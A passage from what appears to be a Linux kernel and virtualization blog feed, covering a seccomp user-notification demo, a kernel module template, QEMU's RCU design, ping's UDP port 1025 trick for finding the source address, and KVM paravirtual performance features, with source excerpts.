if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
errExit("prctl");
notifyFd = installNotifyFilter();
if (sendfd(sockPair[0], notifyFd) == -1)
errExit("sendfd");
if (close(notifyFd) == -1)
errExit("close-target-notify-fd");
closeSocketPair(sockPair);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
sockaddr.sin_family = AF_INET;
sockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
sockaddr.sin_port = htons(80);
if (bind(sockfd, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))
errExit("Target process: bind error");
if (listen(sockfd, 1024))
errExit("Target process: listen error");
printf("listen success\n");
}
static void
checkNotificationIdIsValid(int notifyFd, __u64 id, char *tag)
{
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ID_VALID, &id) == -1) {
fprintf(stderr, "Tracer: notification ID check (%s): "
"target has died!!!!!!!!!!!\n", tag);
}
}
/* Handle notifications that arrive via SECCOMP_RET_USER_NOTIF file
descriptor, 'notifyFd'. */
static void
watchForNotifications(int notifyFd)
{
struct seccomp_notif *req;
struct seccomp_notif_resp *resp;
struct seccomp_notif_sizes sizes;
char path[PATH_MAX];
int procMem; /* FD for /proc/PID/mem of target process */
int pidfd;
int listennum;
int listenfd;
struct sockaddr_in sa;
socklen_t salen = sizeof(sa);
if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, &sizes) == -1)
errExit("Tracer: seccomp-SECCOMP_GET_NOTIF_SIZES");
req = malloc(sizes.seccomp_notif);
if (req == NULL)
errExit("Tracer: malloc");
resp = malloc(sizes.seccomp_notif_resp);
if (resp == NULL)
errExit("Tracer: malloc");
/* Loop handling notifications */
for (;;) {
/* Wait for next notification, returning info in '*req' */
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
errExit("Tracer: ioctlSECCOMP_IOCTL_NOTIF_RECV");
printf("Tracer: got notification for PID %d; ID is %llx\n",
req->pid, req->id);
pidfd = pidfd_open(req->pid, 0);
listennum = req->data.args[0];
listenfd = pidfd_getfd(pidfd, listennum, 0);
getsockname(listenfd, (struct sockaddr *)&sa, &salen);
printf("Tracer: listen %d port\n", ntohs(sa.sin_port));
resp->id = req->id;
resp->flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE;
resp->error = 0;
resp->val = 0;
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1) {
if (errno == ENOENT)
printf("Tracer: response failed with ENOENT; perhaps target "
"process's syscall was interrupted by signal?\n");
else
perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
}
}
}
static pid_t
tracerProcess(int sockPair[2])
{
pid_t tracerPid;
tracerPid = fork();
if (tracerPid == -1)
errExit("fork");
if (tracerPid > 0) /* In parent, return PID of child */
return tracerPid;
/* Child falls through to here */
printf("Tracer: PID = %ld\n", (long) getpid());
/* Receive the notification file descriptor from the target process */
int notifyFd = recvfd(sockPair[1]);
if (notifyFd == -1)
errExit("recvfd");
closeSocketPair(sockPair); /* We no longer need the socket pair */
/* Handle notifications */
watchForNotifications(notifyFd);
exit(EXIT_SUCCESS); /* NOTREACHED */
}
int main(int argc, char *argv[])
{
pid_t targetPid, tracerPid;
int sockPair[2];
setbuf(stdout, NULL);
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
errExit("socketpair");
targetPid = targetProcess(sockPair, &argv[optind]);
tracerPid = tracerProcess(sockPair);
closeSocketPair(sockPair);
waitpid(targetPid, NULL, 0);
printf("Parent: target process has terminated\n");
waitpid(tracerPid, NULL, 0);
exit(EXIT_SUCCESS);
}
</code></pre></div></div>
hello world driver2021-05-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/12/hello-driver
<p>After several years of kernel development, I still can’t remember the template of a driver, so I wrote this post.</p>
<h3> Ubuntu </h3>
<p>Install kernel header.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install linux-headers-`uname -r`
</code></pre></div></div>
<p>hello.c</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/module.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
static int hello_init(void)
{
printk("Hello word\n");
return 0;
}
static void hello_exit(void)
{
printk("Goodbye,Hello word\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Makefile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> obj-m+=hello.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean
</code></pre></div></div>
<h3> redhat </h3>
<p>yum install kernel-devel-<code class="language-plaintext highlighter-rouge">uname -r</code></p>
QEMU RCU implementation2021-03-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/03/14/qemu-rcu
<p>RCU is a synchronization mechanism first used in the Linux kernel. There is also a userspace RCU implementation library called liburcu. In general, RCU is used to protect read-mostly data structures.
This post is about how QEMU implements RCU.</p>
<h3> Overview </h3>
<p>QEMU’s RCU is ported from liburcu. liburcu has several variants; to be least invasive, QEMU chose the urcu-mb implementation.</p>
<p>The QEMU RCU core has a global counter named ‘rcu_gp_ctr’ which is used by both readers and updaters.
Every thread has a thread-local ‘ctr’ counter in its ‘rcu_reader_data’ struct.</p>
<p>The updater increments the global counter in ‘synchronize_rcu’ to indicate a new version of the resource.
The reader copies ‘rcu_gp_ctr’ into its own ‘ctr’ variable when calling ‘rcu_read_lock’.</p>
<p>When ‘synchronize_rcu’ finds that a reader’s ‘ctr’ differs from ‘rcu_gp_ctr’, it sets that reader’s ‘rcu_reader_data->waiting’ flag; when ‘rcu_read_unlock’ sees this flag set, it triggers an event to notify ‘synchronize_rcu’ that the reader has left the critical section. The following picture shows the idea of QEMU RCU.</p>
<p><img src="/assets/img/qemurcu/1.png" alt="" /></p>
<p>‘rcu_reader_data’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct rcu_reader_data {
/* Data used by both reader and synchronize_rcu() */
unsigned long ctr;
bool waiting;
/* Data used by reader only */
unsigned depth;
/* Data used for registry, protected by rcu_registry_lock */
QLIST_ENTRY(rcu_reader_data) node;
};
</code></pre></div></div>
<h3> Initialization </h3>
<p>Every thread that uses RCU needs to call ‘rcu_register_thread’ to insert its thread-local ‘rcu_reader’ variable into the global registry list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void rcu_register_thread(void)
{
assert(rcu_reader.ctr == 0);
qemu_mutex_lock(&rcu_registry_lock);
QLIST_INSERT_HEAD(&registry, &rcu_reader, node);
qemu_mutex_unlock(&rcu_registry_lock);
}
</code></pre></div></div>
<h3> Read side </h3>
<p>‘rcu_read_lock’ is used by the reader. ‘rcu_reader->depth’ handles the nested-lock case. Here we can see it copies ‘rcu_gp_ctr’ into ‘rcu_reader->ctr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_lock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
unsigned ctr;
if (p_rcu_reader->depth++ > 0) {
return;
}
ctr = qatomic_read(&rcu_gp_ctr);
qatomic_set(&p_rcu_reader->ctr, ctr);
/* Write p_rcu_reader->ctr before reading RCU-protected pointers. */
smp_mb_placeholder();
}
</code></pre></div></div>
<p>‘rcu_read_unlock’ is used by the reader when leaving the critical section. It resets ‘rcu_reader->ctr’ to 0, and if it finds ‘rcu_reader->waiting’ set, it signals ‘rcu_gp_event’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_unlock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
assert(p_rcu_reader->depth != 0);
if (--p_rcu_reader->depth > 0) {
return;
}
/* Ensure that the critical section is seen to precede the
* store to p_rcu_reader->ctr. Together with the following
* smp_mb_placeholder(), this ensures writes to p_rcu_reader->ctr
* are sequentially consistent.
*/
qatomic_store_release(&p_rcu_reader->ctr, 0);
/* Write p_rcu_reader->ctr before reading p_rcu_reader->waiting. */
smp_mb_placeholder();
if (unlikely(qatomic_read(&p_rcu_reader->waiting))) {
qatomic_set(&p_rcu_reader->waiting, false);
qemu_event_set(&rcu_gp_event);
}
}
</code></pre></div></div>
<h3> Write side </h3>
<p>The updater calls ‘call_rcu’, which inserts a node into the RCU thread’s queue. The thread function ‘call_rcu_thread’ processes this queue and calls ‘synchronize_rcu’. In the common case, ‘synchronize_rcu’ increments ‘rcu_gp_ctr’ and calls ‘wait_for_readers’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void synchronize_rcu(void)
{
QEMU_LOCK_GUARD(&rcu_sync_lock);
/* Write RCU-protected pointers before reading p_rcu_reader->ctr.
* Pairs with smp_mb_placeholder() in rcu_read_lock().
*/
smp_mb_global();
QEMU_LOCK_GUARD(&rcu_registry_lock);
if (!QLIST_EMPTY(&registry)) {
/* In either case, the qatomic_mb_set below blocks stores that free
* old RCU-protected pointers.
*/
if (sizeof(rcu_gp_ctr) < 8) {
...
} else {
/* Increment current grace period. */
qatomic_mb_set(&rcu_gp_ctr, rcu_gp_ctr + RCU_GP_CTR);
}
wait_for_readers();
}
}
</code></pre></div></div>
<p>‘rcu_gp_ongoing’ checks whether a reader is still in a critical section. If so, the new ‘rcu_gp_ctr’ will not equal that reader’s ‘rcu_reader_data->ctr’, and ‘wait_for_readers’ sets ‘rcu_reader_data->waiting’ to true. Once ‘registry’ is empty, all readers have left their critical sections; no reader holds the old version of the pointer, so the RCU thread can invoke the callbacks that were inserted into the RCU queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void wait_for_readers(void)
{
ThreadList qsreaders = QLIST_HEAD_INITIALIZER(qsreaders);
struct rcu_reader_data *index, *tmp;
for (;;) {
/* We want to be notified of changes made to rcu_gp_ongoing
* while we walk the list.
*/
qemu_event_reset(&rcu_gp_event);
/* Instead of using qatomic_mb_set for index->waiting, and
* qatomic_mb_read for index->ctr, memory barriers are placed
* manually since writes to different threads are independent.
* qemu_event_reset has acquire semantics, so no memory barrier
* is needed here.
*/
QLIST_FOREACH(index, &registry, node) {
qatomic_set(&index->waiting, true);
}
/* Here, order the stores to index->waiting before the loads of
* index->ctr. Pairs with smp_mb_placeholder() in rcu_read_unlock(),
* ensuring that the loads of index->ctr are sequentially consistent.
*/
smp_mb_global();
QLIST_FOREACH_SAFE(index, &registry, node, tmp) {
if (!rcu_gp_ongoing(&index->ctr)) {
QLIST_REMOVE(index, node);
QLIST_INSERT_HEAD(&qsreaders, index, node);
/* No need for mb_set here, worst of all we
* get some extra futex wakeups.
*/
qatomic_set(&index->waiting, false);
}
}
if (QLIST_EMPTY(&registry)) {
break;
}
/* Wait for one thread to report a quiescent state and try again.
* Release rcu_registry_lock, so rcu_(un)register_thread() doesn't
* wait too much time.
*
* rcu_register_thread() may add nodes to &registry; it will not
* wake up synchronize_rcu, but that is okay because at least another
* thread must exit its RCU read-side critical section before
* synchronize_rcu is done. The next iteration of the loop will
* move the new thread's rcu_reader from &registry to &qsreaders,
* because rcu_gp_ongoing() will return false.
*
* rcu_unregister_thread() may remove nodes from &qsreaders instead
* of &registry if it runs during qemu_event_wait. That's okay;
* the node then will not be added back to &registry by QLIST_SWAP
* below. The invariant is that the node is part of one list when
* rcu_registry_lock is released.
*/
qemu_mutex_unlock(&rcu_registry_lock);
qemu_event_wait(&rcu_gp_event);
qemu_mutex_lock(&rcu_registry_lock);
}
/* put back the reader list in the registry */
QLIST_SWAP(&registry, &qsreaders, node);
}
static inline int rcu_gp_ongoing(unsigned long *ctr)
{
unsigned long v;
v = qatomic_read(ctr);
return v && (v != rcu_gp_ctr);
}
</code></pre></div></div>
Why ping uses UDP port 10252021-02-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/02/19/ping-1025
<p>Recently I noticed that the ping source code has an interesting trick.
It creates a UDP socket and connects it to the destination using port 1025. The code is <a href="https://github.com/iputils/iputils/blob/master/ping/ping.c#L707">here</a>.</p>
<p>At first glance this is strange, since ping just uses ICMP to test connectivity between two IPs.</p>
<p>So let’s see what happens.</p>
<p>In one terminal we use tcpdump to capture the packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
</code></pre></div></div>
<p>In another terminal we strace the ping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping 8.8.8.8 -c 1
</code></pre></div></div>
<p>After ping terminates, we can see that tcpdump captured no packet related to port 1025.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
07:29:19.390097 IP (tos 0x0, ttl 64, id 9390, offset 0, flags [DF], proto ICMP (1), length 84)
192.168.80.146 > 8.8.8.8: ICMP echo request, id 2, seq 1, length 64
07:29:19.688639 IP (tos 0x0, ttl 128, id 44019, offset 0, flags [none], proto ICMP (1), length 84)
8.8.8.8 > 192.168.80.146: ICMP echo reply, id 2, seq 1, length 64
</code></pre></div></div>
<p>Let’s see the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(1025), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
getsockname(5, {sa_family=AF_INET, sin_port=htons(43043), sin_addr=inet_addr("192.168.80.146")}, [16]) = 0
close(5) = 0
</code></pre></div></div>
<p>UDP port 1025 never appears on the wire; it exists only in the socket/connect/getsockname/close sequence.</p>
<p>After searching the internet, I found this is a trick to get the source IP that the ping program will use.</p>
<p>Port 1025 is only used when no source IP is specified. If we specify the source IP, there is no connect call in the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping -I 192.168.80.146 8.8.8.8 -c 1
</code></pre></div></div>
<p>Finally, let’s look into the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
int, addrlen)
{
return __sys_connect(fd, uservaddr, addrlen);
}
__sys_connect
->__sys_connect_file
->sock->ops->connect(inet_stream_connect)
->__inet_stream_connect
->sk->sk_prot->connect(ip4_datagram_connect)
->__ip4_datagram_connect
->ip_route_connect
->ip_route_connect_init
->__ip_route_output_key
->ip_route_output_key_hash
->ip_route_output_key_hash_rcu
->flowi4_update_output
->ip_route_output_flow
</code></pre></div></div>
<p>It seems that ‘ip_route_output_key_hash_rcu’ chooses the source address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ip_route_output_key_hash_rcu
if (!fl4->saddr) {
if (ipv4_is_multicast(fl4->daddr))
fl4->saddr = inet_select_addr(dev_out, 0,
fl4->flowi4_scope);
else if (!fl4->daddr)
fl4->saddr = inet_select_addr(dev_out, 0,
RT_SCOPE_HOST);
}
__ip4_datagram_connect
if (!inet->inet_saddr)
inet->inet_saddr = fl4->saddr; /* Update source address */
</code></pre></div></div>
<p>In the getsockname syscall, we can see it gets the source IP from ‘inet->inet_saddr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int inet_getname(struct socket *sock, struct sockaddr *uaddr,
int peer)
{
struct sock *sk = sock->sk;
struct inet_sock *inet = inet_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, sin, uaddr);
sin->sin_family = AF_INET;
if (peer) {
...
} else {
__be32 addr = inet->inet_rcv_saddr;
if (!addr)
addr = inet->inet_saddr;
sin->sin_port = inet->inet_sport;
sin->sin_addr.s_addr = addr;
}
...
}
EXPORT_SYMBOL(inet_getname);
</code></pre></div></div>
<h3> Reference </h3>
<p>https://echorand.me/posts/my-own-ping/</p>
<p>https://jeffpar.github.io/kbarchive/kb/129/Q129065/</p>
<p>https://github.com/iputils/iputils/issues/125</p>
<p>https://stackoverflow.com/questions/25879280/getting-my-own-ip-address-by-connecting-using-udp-socket</p>
kvm performance optimization technologies, part two2020-10-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/10/01/kvm-performance-2
<p>In full virtualization the guest OS is not aware that it is running in a VM. If the OS knows it is running in a VM, it can do some optimizations to improve performance. This is called paravirtualization (PV). Generally speaking, any technique used in the guest OS that is based on the assumption that it is running in a VM can be called a PV technique. For example, virtio is a PV framework, and <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a PV feature. However, in this post I will not talk about these more complicated features but about some smaller PV performance optimizations.</p>
<p>One of the most important things in VM optimization is to reduce VM-exits as much as possible; ideally there are none at all.</p>
<p>This is the second part of KVM performance optimization technologies, following up on <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1">part one</a>. This post covers the following PV optimizations:</p>
<ul>
<li>PV unhalt</li>
<li>Host/Guest halt poll</li>
<li>Disable mwait/hlt/pause</li>
<li>Exitless timer</li>
</ul>
<h3> PV unhalt </h3>
<p>Its name may cause confusion; in fact this feature is about spinlocks.
In a virtualized environment, the vcpu holding a spinlock may be preempted by the scheduler. Another vcpu trying to take the spinlock will then spin until the holder vcpu is scheduled again, which may take quite a long time.</p>
<p>The PV unhalt feature sets pv_lock_ops to override the native spinlock functions so they can be better optimized. More references can be found <a href="https://wiki.xen.org/wiki/Benchmarking_the_new_PV_ticketlock_implementation">here</a> and <a href="http://www.xen.org/files/xensummitboston08/LHP.pdf">here</a>.</p>
<p>Though the full PV spinlock implementation depends on the underlying spinlock flavor, such as ticket locks or queued spinlocks, the basic idea is the same: instead of spinning while it can’t get the lock, the vcpu executes the halt instruction and lets another vcpu be scheduled.</p>
<h4> guest side </h4>
<p>When the guest startup, ‘kvm_spinlock_init’ is used to initialize the pv spinlock.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init kvm_spinlock_init(void)
{
/* Does host kernel support KVM_FEATURE_PV_UNHALT? */
if (!kvm_para_has_feature(KVM_FEATURE_PV_UNHALT))
return;
if (kvm_para_has_hint(KVM_HINTS_REALTIME))
return;
/* Don't use the pvqspinlock code if there is only 1 vCPU. */
if (num_possible_cpus() == 1)
return;
__pv_init_lock_hash();
pv_ops.lock.queued_spin_lock_slowpath = __pv_queued_spin_lock_slowpath;
pv_ops.lock.queued_spin_unlock =
PV_CALLEE_SAVE(__pv_queued_spin_unlock);
pv_ops.lock.wait = kvm_wait;
pv_ops.lock.kick = kvm_kick_cpu;
if (kvm_para_has_feature(KVM_FEATURE_STEAL_TIME)) {
pv_ops.lock.vcpu_is_preempted =
PV_CALLEE_SAVE(__kvm_vcpu_is_preempted);
}
}
</code></pre></div></div>
<p>The key callbacks are ‘kvm_wait’ and ‘kvm_kick_cpu’, invoked through ‘pv_wait’ and ‘pv_kick’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline void pv_wait(u8 *ptr, u8 val)
{
PVOP_VCALL2(lock.wait, ptr, val);
}
</code></pre></div></div>
<p>Then it will execute the halt instruction in ‘kvm_wait’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_wait(u8 *ptr, u8 val)
{
unsigned long flags;
if (in_nmi())
return;
local_irq_save(flags);
if (READ_ONCE(*ptr) != val)
goto out;
/*
* halt until it's our turn and kicked. Note that we do safe halt
* for irq enabled case to avoid hang when lock info is overwritten
* in irq spinlock slowpath and no spurious interrupt occur to save us.
*/
if (arch_irqs_disabled_flags(flags))
halt();
else
safe_halt();
out:
local_irq_restore(flags);
}
</code></pre></div></div>
<p>When a vcpu can’t get the spinlock, the ‘wait’ callback is called.
When the lock is released and a vcpu may take it, the ‘kick’ callback is invoked through ‘pv_kick’. ‘kvm_kick_cpu’ then issues a KVM_HC_KICK_CPU hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_kick_cpu(int cpu)
{
int apicid;
unsigned long flags = 0;
apicid = per_cpu(x86_cpu_to_apicid, cpu);
kvm_hypercall2(KVM_HC_KICK_CPU, flags, apicid);
}
</code></pre></div></div>
<h4> kvm side </h4>
<p>First of all, KVM should expose ‘KVM_FEATURE_PV_UNHALT’ to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
...
</code></pre></div></div>
<p>When the guest executes the halt instruction, ‘kvm_emulate_halt’->‘kvm_vcpu_halt’ is called. This sets ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_HALTED’. Then ‘vcpu_block’ is called to block this vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline int vcpu_block(struct kvm *kvm, struct kvm_vcpu *vcpu)
{
if (!kvm_arch_vcpu_runnable(vcpu) &&
(!kvm_x86_ops.pre_block || kvm_x86_ops.pre_block(vcpu) == 0)) {
srcu_read_unlock(&kvm->srcu, vcpu->srcu_idx);
kvm_vcpu_block(vcpu);
vcpu->srcu_idx = srcu_read_lock(&kvm->srcu);
if (kvm_x86_ops.post_block)
kvm_x86_ops.post_block(vcpu);
if (!kvm_check_request(KVM_REQ_UNHALT, vcpu))
return 1;
}
kvm_apic_accept_events(vcpu);
switch(vcpu->arch.mp_state) {
case KVM_MP_STATE_HALTED:
vcpu->arch.pv.pv_unhalted = false;
vcpu->arch.mp_state =
KVM_MP_STATE_RUNNABLE;
/* fall through */
case KVM_MP_STATE_RUNNABLE:
vcpu->arch.apf.halted = false;
break;
case KVM_MP_STATE_INIT_RECEIVED:
break;
default:
return -EINTR;
}
return 1;
}
</code></pre></div></div>
<p>When the guest triggers the ‘KVM_HC_KICK_CPU’ hypercall, ‘kvm_pv_kick_cpu_op’ and ‘kvm_sched_yield’ are called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_KICK_CPU:
kvm_pv_kick_cpu_op(vcpu->kvm, a0, a1);
kvm_sched_yield(vcpu->kvm, a1);
}
</code></pre></div></div>
<p>‘kvm_pv_kick_cpu_op’ sends an interrupt to the target LAPIC.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_pv_kick_cpu_op(struct kvm *kvm, unsigned long flags, int apicid)
{
struct kvm_lapic_irq lapic_irq;
lapic_irq.shorthand = APIC_DEST_NOSHORT;
lapic_irq.dest_mode = APIC_DEST_PHYSICAL;
lapic_irq.level = 0;
lapic_irq.dest_id = apicid;
lapic_irq.msi_redir_hint = false;
lapic_irq.delivery_mode = APIC_DM_REMRD;
kvm_irq_delivery_to_apic(kvm, NULL, &lapic_irq, NULL);
}
</code></pre></div></div>
<p>Then in ‘__apic_accept_irq’ it will kick the blocked vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case APIC_DM_REMRD:
result = 1;
vcpu->arch.pv.pv_unhalted = 1;
kvm_make_request(KVM_REQ_EVENT, vcpu);
kvm_vcpu_kick(vcpu);
break;
</code></pre></div></div>
<p>When ‘kvm_vcpu_block’ returns, ‘vcpu_block’ sets ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_RUNNABLE’ and the vcpu can go on to take the spinlock.</p>
<h3> Host/Guest halt poll </h3>
<p>Under some circumstances the overhead of the idle->running or running->idle transition is high, especially around the halt instruction.
With host halt polling, when a vcpu executes halt and causes a VM-exit, ‘kvm_vcpu_block’ polls for wakeup conditions for a while before giving the cpu back to the scheduler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vcpu->halt_poll_ns && !kvm_arch_no_poll(vcpu)) {
ktime_t stop = ktime_add_ns(ktime_get(), vcpu->halt_poll_ns);
++vcpu->stat.halt_attempted_poll;
do {
/*
* This sets KVM_REQ_UNHALT if an interrupt
* arrives.
*/
if (kvm_vcpu_check_block(vcpu) < 0) {
++vcpu->stat.halt_successful_poll;
if (!vcpu_valid_wakeup(vcpu))
++vcpu->stat.halt_poll_invalid;
goto out;
}
poll_end = cur = ktime_get();
} while (single_task_running() && ktime_before(cur, stop));
}
</code></pre></div></div>
<p>This code is quite simple: if the wakeup condition arrives during the poll, it will ‘goto out’ and the vcpu will not be blocked.</p>
<p>Guest halt polling avoids this overhead by polling in the guest kernel instead of the host kernel.
Compared with KVM halt polling, guest halt polling also avoids the context switch from non-root mode to root mode.</p>
<p>Before entering halt, the guest polls for some time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __cpuidle poll_idle(struct cpuidle_device *dev,
struct cpuidle_driver *drv, int index)
{
u64 time_start = local_clock();
dev->poll_time_limit = false;
local_irq_enable();
if (!current_set_polling_and_test()) {
unsigned int loop_count = 0;
u64 limit;
limit = cpuidle_poll_time(drv, dev);
while (!need_resched()) {
cpu_relax();
if (loop_count++ < POLL_IDLE_RELAX_COUNT)
continue;
loop_count = 0;
if (local_clock() - time_start > limit) {
dev->poll_time_limit = true;
break;
}
}
}
current_clr_polling();
return index;
}
</code></pre></div></div>
<p>When sending an IPI to a cpu, the kernel checks whether the polling flag is set; if it is, it just sets ‘_TIF_NEED_RESCHED’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool set_nr_if_polling(struct task_struct *p)
{
struct thread_info *ti = task_thread_info(p);
typeof(ti->flags) old, val = READ_ONCE(ti->flags);
for (;;) {
if (!(val & _TIF_POLLING_NRFLAG))
return false;
if (val & _TIF_NEED_RESCHED)
return true;
old = cmpxchg(&ti->flags, val, val | _TIF_NEED_RESCHED);
if (old == val)
break;
val = old;
}
return true;
}
void send_call_function_single_ipi(int cpu)
{
struct rq *rq = cpu_rq(cpu);
if (!set_nr_if_polling(rq->idle))
arch_send_call_function_single_ipi(cpu);
else
trace_sched_wake_idle_without_ipi(cpu);
}
</code></pre></div></div>
<p>This avoids sending the IPI.</p>
<p>The cpuid feature bit ‘KVM_FEATURE_POLL_CONTROL’ controls which side polls: when the host advertises this bit, enabling guest halt polling disables host halt polling, and vice versa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void arch_haltpoll_enable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL)) {
pr_err_once("kvm: host does not support poll control\n");
pr_err_once("kvm: host upgrade recommended\n");
return;
}
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_disable_host_haltpoll, NULL, 1);
}
EXPORT_SYMBOL_GPL(arch_haltpoll_enable);
void arch_haltpoll_disable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL))
return;
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_enable_host_haltpoll, NULL, 1);
}
</code></pre></div></div>
<h3> Disable mwait/hlt/pause </h3>
<p>For some workloads, latency improves if mwait/hlt/pause do not cause VM-exits. Userspace (QEMU) can check and set the per-VM capability KVM_CAP_X86_DISABLE_EXITS so that these instructions are not intercepted.</p>
<p>‘kvm_arch’ has the following fields, which userspace can set:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mwait_in_guest;
bool hlt_in_guest;
bool pause_in_guest;
bool cstate_in_guest;
</code></pre></div></div>
<p>During VM initialization, KVM checks these fields and sets the corresponding vmcs fields. For example, the mwait and hlt case:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u32 vmx_exec_control(struct vcpu_vmx *vmx)
{
...
if (kvm_mwait_in_guest(vmx->vcpu.kvm))
exec_control &= ~(CPU_BASED_MWAIT_EXITING |
CPU_BASED_MONITOR_EXITING);
if (kvm_hlt_in_guest(vmx->vcpu.kvm))
exec_control &= ~CPU_BASED_HLT_EXITING;
return exec_control;
}
</code></pre></div></div>
<h3> Exitless timer </h3>
<p>This feature was also implemented by Wanpeng Li. Here are the <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">slides</a>. The patches are <a href="https://patchwork.kernel.org/cover/11033533/">here</a>.</p>
<p>Both programming the timer in the guest and the emulated timer firing cause VM-exits. The exitless timer uses housekeeping CPUs to deliver the timer interrupt via posted interrupts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_timer_expired(struct kvm_lapic *apic, bool from_timer_fn)
{
struct kvm_vcpu *vcpu = apic->vcpu;
struct kvm_timer *ktimer = &apic->lapic_timer;
if (atomic_read(&apic->lapic_timer.pending))
return;
if (apic_lvtt_tscdeadline(apic) || ktimer->hv_timer_in_use)
ktimer->expired_tscdeadline = ktimer->tscdeadline;
...
